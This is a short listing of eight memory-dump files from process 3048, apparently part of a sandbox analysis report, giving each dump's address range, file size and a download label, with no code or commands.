memory/3048-149-0x00000000754F0000-0x0000000076838000-memory.dmp

Filesize
19.3MB

Download
memory/3048-153-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/3048-133-0x0000000000EA0000-0x0000000000F02000-memory.dmp

Filesize
392KB

Download
memory/3048-130-0x0000000074120000-0x00000000742E2000-memory.dmp

Filesize
1.8MB

Download
memory/3048-161-0x0000000005700000-0x0000000005792000-memory.dmp

Filesize
584KB

Download
memory/3048-129-0x0000000000EA0000-0x0000000000F02000-memory.dmp

Filesize
392KB

Download
memory/3048-134-0x0000000000EA0000-0x0000000000F02000-memory.dmp

Filesize
392KB

Download
memory/3048-159-0x0000000005B20000-0x000000000601E000-memory.dmp

Filesize
5.0MB

Download